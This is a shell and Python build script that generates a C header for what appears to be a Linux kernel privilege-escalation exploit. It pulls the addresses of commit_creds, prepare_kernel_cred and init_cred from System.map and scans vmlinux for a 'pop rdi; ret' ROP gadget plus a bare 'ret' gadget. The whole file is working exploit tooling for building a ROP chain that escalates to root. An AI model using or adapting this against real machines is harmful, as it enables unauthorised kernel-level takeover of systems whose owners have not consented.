#!/bin/bash
# Emit gadgets.h to stdout. Reads symbols from $KSRC/System.map and scans
# $KSRC/vmlinux's .text section for the byte sequence "5f c3" (pop rdi; ret).
# Invoked from the Makefile; not intended for direct human use.

set -euo pipefail

KSRC="${1:?usage: $0 <KERNEL_SRC>}"
SYSMAP="$KSRC/System.map"
VMLINUX="$KSRC/vmlinux"

[[ -r "$SYSMAP"  ]] || { echo "find_gadgets.sh: cannot read $SYSMAP"  >&2; exit 1; }
[[ -r "$VMLINUX" ]] || { echo "find_gadgets.sh: cannot read $VMLINUX" >&2; exit 1; }

lookup_sym() {
    local sym="$1"
    local addr
    addr=$(awk -v s="$sym" '$3 == s { print $1; exit }' "$SYSMAP")
    [[ -n "$addr" ]] || { echo "find_gadgets.sh: symbol '$sym' not found in System.map" >&2; exit 1; }
    printf '0x%s' "$addr"
}

COMMIT_CREDS=$(lookup_sym commit_creds)
PREP_KCRED=$(lookup_sym prepare_kernel_cred)
INIT_CRED=$(lookup_sym init_cred)

POP_RDI_RET=$(python3 - "$VMLINUX" <<'PY'
import re, subprocess, sys
vmlinux = sys.argv[1]
hdr = subprocess.check_output(["objdump", "-h", vmlinux], text=True)
vma = file_off = size = None
for line in hdr.splitlines():
    parts = line.split()
    if len(parts) >= 7 and parts[1] == ".text":
        size, vma, _lma, file_off = int(parts[2], 16), int(parts[3], 16), parts[4], int(parts[5], 16)
        break
if vma is None:
    sys.exit("find_gadgets.sh: .text section not found in vmlinux")
with open(vmlinux, "rb") as f:
    f.seek(file_off)
    text = f.read(size)
m = re.search(b"\x5f\xc3", text)
if not m:
    sys.exit("find_gadgets.sh: byte sequence 5f c3 (pop rdi; ret) not found in .text")
print(f"0x{vma + m.start():x}")
PY
)

cat <<EOF
/* AUTO-GENERATED by find_gadgets.sh from $KSRC -- do not edit. */
#ifndef __GADGETS_H__
#define __GADGETS_H__

#define COMMIT_CREDS_ADDR        ${COMMIT_CREDS}UL
#define PREPARE_KERNEL_CRED_ADDR ${PREP_KCRED}UL
#define INIT_CRED_ADDR           ${INIT_CRED}UL

/* Byte sequence 5f c3 in kernel .text -- decodes as 'pop %rdi; ret'. */
#define POP_RDI_RET_GADGET       ${POP_RDI_RET}UL
/* Second byte (c3) of the pair, decodes as a bare 'ret'. */
#define RET_GADGET               (POP_RDI_RET_GADGET + 1UL)

#endif /* __GADGETS_H__ */
EOF
